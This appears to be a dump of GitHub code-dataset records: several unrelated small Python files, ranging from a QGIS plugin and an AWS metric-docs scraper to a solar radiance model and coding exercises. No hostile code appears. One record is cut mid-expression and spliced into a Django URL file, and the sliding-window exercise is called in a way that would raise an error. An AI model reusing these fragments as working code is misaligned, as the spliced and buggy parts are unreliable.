\n# Set the attribute to 0 for all existing features\ndef updateAttribute(layer, attribute_name):\n    attributeIndex = layer.fields().indexFromName(attribute_name)\n    if attributeIndex != -1:\n        for feat in layer.getFeatures():\n            layer.changeAttributeValue(feat.id(), attributeIndex, 0)\n\ndef setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly = True):\n    layer.setDefaultValueDefinition(attributeIndex, QgsDefaultValue(default_value, applyOnUpdate=applyOnUpdate))\n    if readOnly:\n        setReadOnlyAttribute(layer, attributeIndex)\n\ndef setAlias(layer, attributeIndex, alias):\n    layer.setFieldAlias(attributeIndex, alias)\n\nclass eTracability:\n    \"\"\"QGIS Plugin Implementation.\"\"\"\n\n    def __init__(self, iface):\n        \"\"\"Constructor.\n\n        :param iface: An interface instance that will be passed to this class\n            which provides the hook by which you can manipulate the QGIS\n            application at run time.\n        :type iface: QgsInterface\n        \"\"\"\n        # Save reference to the QGIS interface\n        self.iface = iface\n        # initialize plugin directory\n        self.plugin_dir = os.path.dirname(__file__)\n        # initialize locale\n        locale = QSettings().value('locale/userLocale')[0:2]\n        locale_path = os.path.join(\n            self.plugin_dir,\n            'i18n',\n            'eTracability_{}.qm'.format(locale))\n\n        if os.path.exists(locale_path):\n            self.translator = QTranslator()\n            self.translator.load(locale_path)\n            QCoreApplication.installTranslator(self.translator)\n\n        # Declare instance attributes\n        self.actions = []\n        self.menu = self.tr(u'&eTracability Automatic Accountability Tracker')\n\n        # Check if plugin was started the first time in current QGIS session\n        # Must be set in initGui() to survive plugin reloads\n        self.first_start = None\n\n    # noinspection PyMethodMayBeStatic\n    def tr(self, message):\n        \"\"\"Get the translation for a string using Qt translation API.\n\n        We implement this ourselves since we do not inherit QObject.\n\n        :param message: String for translation.\n        :type message: str, QString\n\n        :returns: Translated version of message.\n        :rtype: QString\n        \"\"\"\n        # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n        return QCoreApplication.translate('eTracability', message)\n\n\n    def add_action(\n        self,\n        icon_path,\n        text,\n        callback,\n        enabled_flag=True,\n        add_to_menu=True,\n        add_to_toolbar=True,\n        status_tip=None,\n        whats_this=None,\n        parent=None):\n        \"\"\"Add a toolbar icon to the toolbar.\n\n        :param icon_path: Path to the icon for this action. Can be a resource\n            path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n        :type icon_path: str\n\n        :param text: Text that should be shown in menu items for this action.\n        :type text: str\n\n        :param callback: Function to be called when the action is triggered.\n        :type callback: function\n\n        :param enabled_flag: A flag indicating if the action should be enabled\n            by default. Defaults to True.\n        :type enabled_flag: bool\n\n        :param add_to_menu: Flag indicating whether the action should also\n            be added to the menu. Defaults to True.\n        :type add_to_menu: bool\n\n        :param add_to_toolbar: Flag indicating whether the action should also\n            be added to the toolbar. 
Defaults to True.\n        :type add_to_toolbar: bool\n\n        :param status_tip: Optional text to show in a popup when mouse pointer\n            hovers over the action.\n        :type status_tip: str\n\n        :param parent: Parent widget for the new action. Defaults None.\n        :type parent: QWidget\n\n        :param whats_this: Optional text to show in the status bar when the\n            mouse pointer hovers over the action.\n\n        :returns: The action that was created. Note that the action is also\n            added to self.actions list.\n        :rtype: QAction\n        \"\"\"\n\n        icon = QIcon(icon_path)\n        action = QAction(icon, text, parent)\n        action.triggered.connect(callback)\n        action.setEnabled(enabled_flag)\n\n        if status_tip is not None:\n            action.setStatusTip(status_tip)\n\n        if whats_this is not None:\n            action.setWhatsThis(whats_this)\n\n        if add_to_toolbar:\n            # Adds plugin icon to Plugins toolbar\n            self.iface.addToolBarIcon(action)\n\n        if add_to_menu:\n            self.iface.addPluginToVectorMenu(\n                self.menu,\n                action)\n\n        self.actions.append(action)\n\n        return action\n\n    def initGui(self):\n        \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\"\n\n        icon_path = ':/plugins/e_tracability/icon.png'\n        self.add_action(\n            icon_path,\n            text=self.tr(u'eTraceability - Current layer'),\n            callback=self.run_single,\n            parent=self.iface.mainWindow())\n\n        # Icon for multi-layer processing\n        icon_path = ':/plugins/e_tracability/iconmultiple.png'\n        self.add_action(\n            icon_path,\n            text=self.tr(u'eTraceability - All layers'),\n            callback=self.run,\n            parent=self.iface.mainWindow())\n        \n        # will be set False in run()\n        self.first_start = True\n\n\n    def unload(self):\n        \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n        for action in self.actions:\n            self.iface.removePluginVectorMenu(\n                self.tr(u'&eTracability Automatic Accountability Tracker'),\n                action)\n            self.iface.removeToolBarIcon(action)\n\n\n    def run(self):\n        project = QgsProject.instance()\n        # Get the layers\n        layerList = project.mapLayers()\n\n        for layer in layerList.values():\n            if layer.type() == QgsMapLayer.VectorLayer:\n                checkAttributes(layer, layer.geometryType())\n        iface.messageBar().pushMessage(\"eTraceability\", \"Done!\", level=Qgis.Info, duration=5)\n\n    def run_single(self):\n        project = QgsProject.instance()\n        # Get current layer\n        layer = self.iface.activeLayer()\n        if layer.type() == QgsMapLayer.VectorLayer:\n            checkAttributes(layer, layer.geometryType())\n        iface.messageBar().pushMessage(\"eTraceability\", \"Done!\", level=Qgis.Info, duration=5)","repo_name":"Skipper-is/qgis_eTracability","sub_path":"e_tracability/e_tracability.py","file_name":"e_tracability.py","file_ext":"py","file_size_in_byte":11692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"7314500947","text":"import pycountry\n\nCITY_STATES = ['Monaco', 'Singapore', 'Vatican City', 'Ceuta', 'Melilla',\n               'Hong Kong', 'Macau', 'Gibraltar', 'Abu Dhabi', 'Ajman', 'Dubai',\n               'Fujairah', 'Ras Al Khaimah', 'Sharjah', 'Umm Al Quwain',\n               'Basel-Stadt', 'Berlin', 'Hamburg', 'Bremen']\n\nCONTINENTS = ['Asia', 'Africa', 'America', 'North America', 'South America',\n              'Europe', 'Antarctica', 'Australia']\n\nEXCEPTIONS = ['England', 'Scotland', 'Wales', 'Curaçao', 'Curacao',\n              'Sint Maarten']\n\ndef is_not_city(s):\n\n    if s in CITY_STATES:\n        return False\n\n    if s in CONTINENTS:\n        return True\n\n    for cntry in pycountry.countries:\n        if s == cntry.name:\n            return True\n\n    if s in EXCEPTIONS:\n        return True\n\n    return 
False\n","repo_name":"deb17/nearby-places","sub_path":"server/app/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"12691662994","text":"import os\nimport cv2\nbase_dir = '/home/jiaheng/Desktop/GitHub/IJB-C-1/GT'\n\nf = open('template_fq.txt','r')\nout = f.readlines()\nfor line in out:\n    _ = line.split(' ')\n    # print(_)\n    id = _[0]\n    _ = _[1].split('/')\n    filename = _[-1]\n    # print(filename)\n    filename = filename.replace('txt', 'jpg').rstrip('\\n')\n    img_path = os.path.join(base_dir, str(id)) + '/img' + '/' + filename\n    print(img_path)\n    img_cv2 = cv2.imread(img_path)\n    # print(img_cv2.shape)\n    # cv2.imshow('', img_cv2)\n    # cv2.waitKey(0)\n    break\n","repo_name":"JiaHeng-DLUT/IJB-C","sub_path":"insightface/deploy/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"26220208397","text":"# There are also AWS docs in markdown format at https://github.com/awsdocs but more complex\n# metric descriptions had formatting errors and sometimes linked out to the HTML docs themselves.\n\n# https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/aws-services-cloudwatch-metrics.html\nimport argparse\nimport re\nfrom abc import abstractmethod\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom textwrap import dedent\nfrom typing import Set, List, Mapping\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tabulate import tabulate\n\nRE_WHITESPACE = re.compile(r\"\\s+\")\nRE_REMOVE_PARENS = re.compile(r\"^\\(.*\\)\")\n\n\ndef _clean_whitespace(s):\n    \"\"\"Replaces consecutive whitespace with a single space anywhere inside the string.\"\"\"\n    return RE_WHITESPACE.sub(\" \", s).strip()\n\n\ndef _remove_parens(s):\n    \"\"\"Removes all text inside parentheses at the beginning of the string.\"\"\"\n    return RE_REMOVE_PARENS.sub(\"\", s).strip()\n\ndef _replace_brackets(s):\n    \"\"\"Replaces brackets with parentheses because brackets break the UI.\"\"\"\n    # It probably thinks the brackets are markdown or something.\n    return s.replace(\"[\", \"(\").replace(\"]\", \")\").strip()\n\n\n@dataclass\nclass Metric:\n    name: str\n    brief: str\n\n\nclass Extractor:\n    @abstractmethod\n    def extract(self, html) -> List[Metric]:\n        pass\n\n\ndef get_description(desc):\n    clean, *rest = _replace_brackets(_remove_parens(_clean_whitespace(desc.text))).split(\".\")\n\n    if clean.endswith(\".\"):\n        return clean\n    else:\n        return clean + \".\"\n\n\nclass TableExtractor(Extractor):\n    \"\"\"Pulls metrics from a table that has at least the columns \"Metric\" and \"Description\" (but maybe more, which\n    will be ignored).
\"\"\"\n # Sometimes Metric header has trailing whitespace.\n METRIC_HEADER = re.compile(r\"Metric\\s*\")\n\n def extract(self, html) -> List[Metric]:\n # Find all the table headers with a value of Metric.\n for metric_header in html.find_all(\"th\", text=self.METRIC_HEADER):\n # Go up the tree to the table element.\n table = metric_header.parent.parent\n # Iterate through all the table rows, skipping the first one\n # which is the table header.\n for row in table.find_all(\"tr\")[1:]:\n metric, raw_desc, *_, = row.find_all(\"td\")\n desc = get_description(raw_desc)\n\n # Sometimes there will be more than one metric in the table with the same description.\n for metric in metric.text.split(\",\"):\n yield Metric(metric.strip(), desc)\n\n\nclass ListExtractor(Extractor):\n \"\"\"Pulls metrics that are in an HTML description list (
)\"\"\"\n\n def extract(self, html) -> List[Metric]:\n # Assume all dt and dd elements are metric names and descriptions respectively.\n for metric, raw_desc in zip(html.find_all(\"dt\"), html.find_all(\"dd\")):\n desc = get_description(raw_desc)\n yield Metric(metric.text.strip(), desc)\n\n\nLIST = ListExtractor()\nTABLE = TableExtractor()\n\n\n@dataclass\nclass DocSet:\n \"\"\"Specifies a set of URLs to fetch and an extractor that can extract metrics from them\"\"\"\n extractor: Extractor\n urls: Set[str]\n\n\nDOCS: Mapping[str, List[DocSet]] = {\n \"alb\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-cloudwatch-metrics.html\"}),\n ],\n \"api-gateway\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-metrics-and-dimensions.html\",\n })\n ],\n \"autoscaling\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-instance-monitoring.html\",\n })\n ],\n \"cloudfront\": [\n DocSet(TABLE,\n {\"https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/monitoring-using-cloudwatch.html\"})\n ],\n \"dynamodb\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/metrics-dimensions.html\",\n })\n ],\n \"ebs\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/monitoring-volume-status.html\"\n })\n ],\n \"ec2\": [\n DocSet(TABLE,\n {\"https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/viewing_metrics_with_cloudwatch.html\"})\n ],\n \"ecs\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/AmazonECS/latest/developerguide/cloudwatch-metrics.html\"})\n ],\n \"elasticache\": [\n DocSet(TABLE,\n # Make this a list so that the order is deterministic. There are some duplicate events across\n # ElasticCache Redis and memcache so we just pick one.\n [\"https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/CacheMetrics.Redis.html\",\n \"https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/CacheMetrics.HostLevel.html\",\n \"https://docs.aws.amazon.com/AmazonElastiCache/latest/mem-ug/CacheMetrics.Memcached.html\",\n \"https://docs.aws.amazon.com/AmazonElastiCache/latest/mem-ug/CacheMetrics.HostLevel.html\"\n ]),\n ],\n \"elb\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-cloudwatch-metrics.html\"})\n ],\n \"kinesis\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/streams/latest/dev/monitoring-with-cloudwatch.html\"})\n ],\n \"lambda\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/lambda/latest/dg/monitoring-functions-metrics.html\"})\n ],\n \"opsworks\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/opsworks/latest/userguide/monitoring-cloudwatch.html\"})\n ],\n \"rds\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/MonitoringOverview.html\"})\n ],\n \"redshift\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/redshift/latest/mgmt/metrics-listing.html\"})\n ],\n \"route53\": [\n DocSet(LIST, {\"https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/monitoring-cloudwatch.html\",\n \"https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/monitoring-resolver-with-cloudwatch.html\"}),\n ],\n \"sns\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/sns/latest/dg/sns-monitoring-using-cloudwatch.html\"})\n ],\n \"sqs\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-available-cloudwatch-metrics.html\"})\n ],\n}\n\n\nclass Fetcher:\n def 
__init__(self):\n self._sess = requests.Session()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n def fetch(self, url: str, extractor: Extractor) -> List[Metric]:\n data = self._sess.get(url).content\n tree = BeautifulSoup(data, \"html.parser\")\n return list(extractor.extract(tree))\n\n def close(self):\n self._sess.close()\n\n\ndef sync(name, metrics):\n \"\"\"Write markdown docs\"\"\"\n for metric in metrics:\n mdFile = f\"{metric.name}.md\"\n docs = Path().resolve().parent / f\"aws-{name}\" / \"docs\"\n docs.mkdir(exist_ok=True)\n\n (docs / mdFile).write_text(dedent(f\"\"\"\n ---\n title: {metric.name}\n brief: {metric.brief}\n metric_type:\n ---\n ### {metric.name}\n\n {metric.brief}\n \"\"\").strip() + \"\\n\")\n\n\ndef show(name, metrics):\n \"\"\"Show metrics in a table format\"\"\"\n print(tabulate(sorted(((m.name, m.brief) for m in metrics), key=lambda x: x[0]),\n headers=(\"Metric\", \"Description\"), tablefmt=\"github\"))\n\n\ndef main(only=None, cmd_show=False, cmd_sync=False):\n with Fetcher() as f:\n for integration, docsets in DOCS.items():\n if only is not None and integration not in only:\n continue\n\n metrics = []\n metrics_seen = set()\n\n for docset in docsets:\n for url in docset.urls:\n new_metrics = f.fetch(url, docset.extractor)\n new_metric_set = {m.name for m in new_metrics}\n\n if len(metrics_seen & new_metric_set) != 0:\n print(f\"WARNING: Duplicate metrics {new_metric_set & metrics_seen}\")\n\n metrics_seen.update(new_metric_set)\n metrics += new_metrics\n\n if cmd_show:\n show(integration, metrics)\n\n if cmd_sync:\n sync(integration, metrics)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"\"\"AWS metric documentation importer\n\nsync: output contents to meta.yaml files\nshow: print contents in a table format\"\"\", formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"action\", choices=(\"sync\", \"show\"), help=\"see program description\")\n parser.add_argument(\"--only\", nargs=\"+\", help=\"run only the specified integrations\")\n args = parser.parse_args()\n main(args.only, args.action == \"show\", args.action == \"sync\")\n","repo_name":"sunset3000/integrations","sub_path":"aws-import/awsimport.py","file_name":"awsimport.py","file_ext":"py","file_size_in_byte":9091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"17098692620","text":"# coding=utf-8\nfrom math import cos\nfrom math import radians\n\nfrom osem.general.enerapi.base.base import Base\nfrom osem.general import conf\nfrom osem.general.enerapi.common.Guard import *\n\n__author__ = 'VincentRoch'\n\n\nclass SolarFunctionRadianceOntoTiltedPlane(Base):\n \"\"\"\n Calculate direct and diffuse solar radiance onto a tilted plane with free orientation and slope from\n horizontal direct and diffuse radiance\n \"\"\"\n\n _default_parameter_value = {\n \"albedo\": 0.2\n }\n\n @staticmethod\n def help():\n return SolarFunctionRadianceOntoTiltedPlane.__doc__ + \"\\r\\n\" + \\\n SolarFunctionRadianceOntoTiltedPlane.calculate.__doc__\n\n @staticmethod\n def help_calculate():\n return SolarFunctionRadianceOntoTiltedPlane.__init__.__doc__.format(\n SolarFunctionRadianceOntoTiltedPlane._default_parameter_value[\"albedo\"]\n )\n\n def __init__(self, args):\n \"\"\"\n Arguments should be an object of the form:\n\n {{\"GbeamH\": 850.4, \"GdiffuseH\": 126.3, \"dayOfYear\": 158,\n \"incidentAngle\": 32.3, \"zenithAngle\": 23.6,\n \"slope\": 45.0, 
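# Example invocations of the importer above (illustrative; assumes the file is
# saved as awsimport.py, per the record metadata):
#
#   python awsimport.py show --only alb lambda
#   python awsimport.py sync
#
# `show` prints a GitHub-flavored table of metrics; `sync` writes one markdown
# file per metric into the matching aws-<integration>/docs directory.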
\"albedo\": 0.2}}\n\n {{\n GbeamH [W/m2] (positive float)\n GdiffuseH [W/m2] (positive float)\n dayOfYear [day] (integer between 1\n and 365)\n incidentAngle [deg.] (0 smaller equal than\n float smaller equal than 180)\n zenithAngle [deg.] (0 smaller equal than\n float smaller equal than 180)\n slope [deg.] (0 smaller equal than\n float smaller equal than 180)\n albedo [-] (0 smaller float)\n default: {0},\n }}\n \"\"\"\n\n super(SolarFunctionRadianceOntoTiltedPlane, self).__init__(args)\n\n Guard.check_if_key_in_dict(\"GbeamH\", args)\n Guard.check_if_key_in_dict(\"GdiffuseH\", args)\n Guard.check_if_key_in_dict(\"dayOfYear\", args)\n Guard.check_if_key_in_dict(\"incidentAngle\", args)\n Guard.check_if_key_in_dict(\"zenithAngle\", args)\n Guard.check_if_key_in_dict(\"slope\", args)\n\n Guard.check_is_higher(args[\"GbeamH\"], lower_limit=0)\n Guard.check_is_higher(args[\"GdiffuseH\"], lower_limit=0)\n Guard.check_is_higher(args[\"albedo\"], lower_limit=0, strict=True)\n Guard.check_value_in_between(args[\"dayOfYear\"], min=1, max=365)\n Guard.check_value_in_between(args[\"incidentAngle\"], min=0, max=180)\n Guard.check_value_in_between(args[\"zenithAngle\"], min=0, max=180)\n Guard.check_value_in_between(args[\"slope\"], min=0, max=180)\n\n self.args = args\n pass\n\n def calculate(self):\n \"\"\"\n\n The returned object is of the form:\n {\n \"GbeamTiltedPlane\": [W/m2] (0 smaller equal than float)\n \"GdiffuseTiltedPlane\": [W/m2] (0 smaller equal than float)\n \"GtotalTiltedPlane\": [W/m2] (0 smaller equal than float)\n }\n\n Detailed Description:\n\n *********************************************************************\n Inputs:\n *********************************************************************\n GbeamH (Gbh) [W/m2] Beam solar radiation onto a horizontal surface\n (0 smaller equal than GbeamH)\n GdiffuseH (Gdh) [W/m2] Diffuse solar radiation onto a horizontal surface\n (0 smaller equal than GdiffuseH)\n dayOfYear (n) [day] Day of the year (1 smaller equal than dayOfYear smaller equal than 365)\n incidentAngle (t) [deg.] Angle of incidence, the angle between the beam radiation on a surface and\n the normal to that surface (0 smaller equal than IncidentAngle\n smaller equal than 180)\n zenithAngle (tz) [deg.] Angle between the vertical and the line to the sun, that is, the angle of\n incidence of beam radiation on a horizontal surface (cf. \"Zenith angle\"\n hereunder).(0 smaller equal than zenithAngle smaller equal than 180)\n slope (b) [deg.] 
Angle between the plane of the surface in question and the horizontal;\n (0 smaller equal than slope smaller equal than 180).(slope bigger than 90\n means that the surface has a downward-facing component.)\n albedo (alb) [-] Ground albedo or ground reflection factor (0 smaller than albedo)\n\n\n *********************************************************************\n Outputs:\n *********************************************************************\n GbeamTiltedPlane [W/m2] Beam solar radiation onto a tilted surface of slope \"slope\"\n (0 smaller equal than GbeamTiltedPlane)\n GdiffuseTiltedPlane [W/m2] Diffuse solar radiation onto a tilted surface of slope \"slope\"\n (0 smaller equal than GbeamTiltedPlane)\n GtotalTiltedPlane [W/m2] Total solar radiation onto a tilted surface of slope \"slope\",\n GtotalTiltedPlane = GbeamTiltedPlane + GdiffuseTiltedPlane\n (0 smaller equal than GtotalTitledPlane)\n\n *********************************************************************\n Notes:\n *********************************************************************\n All calculations are taken from [1]\n The \"_r\" appended to variables means in Radians\n\n\n *********************************************************************\n Reference:\n *********************************************************************\n [1] B. Perers, P. Kovacs, M. Olsson, and M. P. U. Pettersson, \"A Tool for Standardized Collector Performance\n Calculations including PVT\" Energy Procedia, vol. 30, pp. 1354-1364, 2012.\n\n\n \"\"\"\n n = self.args[\"dayOfYear\"]\n Gbh = float(self.args[\"GbeamH\"])\n Gdh = float(self.args[\"GdiffuseH\"])\n b = float(self.args[\"slope\"])\n alb = float(self.args[\"albedo\"])\n t = float(self.args[\"incidentAngle\"])\n tz = float(self.args[\"zenithAngle\"])\n\n t_r = radians(t)\n tz_r = radians(tz)\n b_r = radians(b)\n\n # Conversion factor between the normal direction to the sun and the collector plane\n if t < 90 and tz < 90:\n Rb = cos(t_r)/cos(tz_r) # [1]\n else:\n Rb = 0\n\n # Extraterrestrial solar radiation on horizontal surface\n Go = 1367 * (1 + 0.033 * cos(radians(360*n/365))) * cos(tz_r) # [1]\n\n # Anisotropy index (how large fraction of the diffuse radiation that is circumsolar)\n Ai = Gbh/Go # [1]\n\n # total solar radiation onto a horizontal surface\n Gth = Gbh + Gdh\n\n # The total radiation onto a tilted plane according to the Hay and Davies model\n Gtt = Gbh*Rb + Gdh*Ai*Rb + Gdh*(1-Ai)*0.5*(1+cos(b_r)) + Gth*alb*0.5*(1-cos(b_r)) # [1]\n\n Gbt = Gbh*Rb\n Gdt = Gtt - Gbt\n\n return {\n \"GbeamTiltedPlane\": Gbt,\n \"GdiffuseTiltedPlane\": Gdt,\n \"GtotalTiltedPlane\": Gtt\n }\n\n def get_reference(self):\n\n return conf.ref_solar_function_onto_tilted_plane\n","repo_name":"CREM-APP/OSEM","sub_path":"osem/natural_resources/solar/solar_function_radiance_onto_tilted_plane.py","file_name":"solar_function_radiance_onto_tilted_plane.py","file_ext":"py","file_size_in_byte":7694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13612076020","text":"# coding: utf-8\n# Problem: Given an array of positive numbers and a positive number ‘s’, \n# find the length of the smallest contiguous subarray whose sum is greater than or equal to ‘S’. 
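# Illustrative usage sketch for the SolarFunctionRadianceOntoTiltedPlane class
# above, reusing the sample arguments from its own __init__ docstring (assumes
# the osem package and its Guard/conf imports resolve; values are examples):
model = SolarFunctionRadianceOntoTiltedPlane({
    "GbeamH": 850.4, "GdiffuseH": 126.3, "dayOfYear": 158,
    "incidentAngle": 32.3, "zenithAngle": 23.6, "slope": 45.0, "albedo": 0.2})
result = model.calculate()
# By construction Gdt = Gtt - Gbt, so the returned components satisfy
# GtotalTiltedPlane == GbeamTiltedPlane + GdiffuseTiltedPlane.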
\n# Return 0, if no such subarray exists.\n# Example input: [2, 1, 5, 2, 3, 2], S=7 \n# Leetcode Equivalent: https://leetcode.com/problems/minimum-size-subarray-sum/\n# Optimal solution: O(n) The outer for loop runs for all elements and the inner while loop processes each element only once, therefore the time complexity of the algorithm will be O(N+N)O(N+N) which is asymptotically equivalent to O(N)O(N).\n\ndef minSubArrayLen(self, array, s):\n windowSum, windowStart = 0.0, 0 \n minWindow = 9999999\n\n for windowEnd in range(0, len(array)): # to increase the window size while we move forward\n windowSum += array[windowEnd] # to increase the sum of the window\n while(windowSum >= s): # keep decreasing the window and try to find the most minimal size that satisfies our condition\n minWindow = min(windowEnd - windowStart + 1, minWindow) \n windowSum -= array[windowStart] # when the window slides the first element gets cut from the sum\n windowStart += 1 # shifting the window over\n \n if minWindow == 9999999:\n return 0\n return minWindow\n\nif __name__ == \"__main__\":\n print(minSubArrayLen([2,3,1,2,4,3], 7))\n","repo_name":"kingpreyansh/grokking-the-coding-interview","sub_path":"1. Sliding Window/3_smallest_subarray_with_sum.py","file_name":"3_smallest_subarray_with_sum.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27567139818","text":"from sqlalchemy.orm import Session\nfrom model import models\n\ndef create_answer(question_id: int, content: str, answer_number: int, db: Session):\n exist_answer = db.query(models.Answer) \\\n .filter(models.Answer.answer_number == answer_number)\\\n .filter(models.Answer.question_id == question_id).first()\n \n if exist_answer is not None:\n db.delete(exist_answer)\n db_answer = models.Answer(\n question_id = question_id,\n answer_number = answer_number,\n content = content\n )\n db.add(db_answer)\n db.commit()\n db.refresh(db_answer)\n return True","repo_name":"NXTung1102000/Graduation-Thesis-2023","sub_path":"back-end/service/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"17927070047","text":"from crawlers import RankingCrawler\nfrom models import RankingCategory\nimport time\n\nspreadsheet = \"Penny Stalkers\"\ncrawler = RankingCrawler(\n user_client=\"tommy\", spreadsheet=spreadsheet, category=RankingCategory.MOST_ACTIVE\n)\ncrawler.scrape_trending_value(sheet=\"MostActive_MessageCount\")\ncrawler.scrape_price_and_follower_count(\n price_sheet=\"MostActive_Price\", watch_sheet=\"MostActive_WatchCount\"\n)\n\ntime.sleep(10)\ncrawler = RankingCrawler(\n user_client=\"tommy\", spreadsheet=spreadsheet, category=RankingCategory.WATCHERS\n)\ncrawler.scrape_trending_value(sheet=\"Watchers_NewCount\")\ncrawler.scrape_price_and_follower_count(\n price_sheet=\"Watchers_Price\", watch_sheet=\"Watchers_WatchCount\"\n)\n","repo_name":"ronakHegde98/penny-stockers","sub_path":"stocktwits/scrapers/watchers_active_jobs.py","file_name":"watchers_active_jobs.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29558573717","text":"get_ipython().magic('pylab inline')\n#from scipy.integrate import ode\n#from scipy.interpolate import interp1d\nfrom dde_state import DDE_state\ndde = DDE_state()\n\nNmax = 10\nts = 
linspace(0,1,100)\nx0s = 0*ts\nxs = dde.evolve_n(ts,x0s,Nmax)\nfor i in arange(10):\n plot(ts,xs[i],label=i)\nplt.legend()\nplt.show()\n\ndef eigen_eq(z,p):\n return z-p*(1-exp(-z))\n\nxs = linspace(-5,2,600)\nys = linspace(-20,20,600)\n\nXS,YS = meshgrid(xs,ys)\n\nP=2\nZS = eigen_eq(XS+1j*YS,P)\n\nmpl.rcParams['mathtext.fontset'] = 'cm'\nmpl.rcParams['mathtext.bf'] = 'serif:bold'\n\nmpl.rcParams['font.family'] = 'serif'\n#mpl.rcParams['font.style'] = 'cmr'\npcolormesh(XS,YS,angle(ZS))\n\nxs2= linspace(-5,0)\neig_f = P*sqrt(exp(-2*xs2)-(xs2/P-1)**2)\nplot(xs2,eig_f,color='w')\nplot(xs2,-eig_f,color='w')\nylim([ys[0],ys[-1]])\n#clim(0,1)\ncolorbar()\n\n#plt.savefig('eigenvals.png')\n\ndef N(p):\n return exp(-p**2)\n\nA = 1\ndef p0(x):\n return A*x/(2.-x)\n\ndef p1(x):\n return A*tan(x) if x /', RetrieveUpdateDestroyUrgentContactsAPIView.as_view(), name='retrieve-update-destroy-urgent-contacts'),\n]\n","repo_name":"linhfishCR7/hrm-api","sub_path":"urgent_contacts/hrm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33664199667","text":"import pandas as pd\r\n\r\n\r\ndata=pd.read_csv(\"datasetoutput.csv\")\r\ntemp=list()\r\ntemp.append(0)\r\nprint(data.shape)\r\nfor i in range(1,data.shape[0]):\r\n temp.append(1)\r\ndata['target']=temp\r\nprint(data)\r\ndata.to_csv(\"D:\\PES6\\Capstone\\Tests\\datasetoutput.csv\")","repo_name":"VishnuJG/CV-Workout","sub_path":"code/funtioning.py","file_name":"funtioning.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28480583024","text":"#https://www.hackerrank.com/challenges/reduce-function/problem\n#take an array of pairs, reduce to a product for numerator and denominator\n\nfrom fractions import Fraction\nfrom functools import reduce\nfrom random import randint\n\nprint(Fraction(2,5).numerator)\n\n\ndef reduce_fraction(count,fracs):\n print(fracs)\n numerators = [f.numerator for f in fracs]\n denominators = [f.denominator for f in fracs]\n numerator = reduce(lambda s,n: s*n, numerators)\n denominator = reduce(lambda s,n: s*n, denominators)\n low_frac = Fraction(numerator,denominator)\n print(f\"{numerator}/{denominator}\")\n return low_frac.numerator, low_frac.denominator\n\n \n\ncount = 3\n# fractions = [(1,3),(2,6),(3,9)]\nfractions = []\nfor _ in range(10):\n fractions.append(Fraction(randint(1,10),randint(9,20)))\n\nx = reduce_fraction(count,fractions)\nprint(x)\n\n ","repo_name":"ayunas/hacker-rank","sub_path":"reduce_fraction.py","file_name":"reduce_fraction.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28828391884","text":"import datetime\nimport requests\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport time\n#class AppURLopener(urllib.request.FancyURLopener):\n# version = \"Mozilla/5.0\"\n\n#opener = AppURLopener()\n#response = 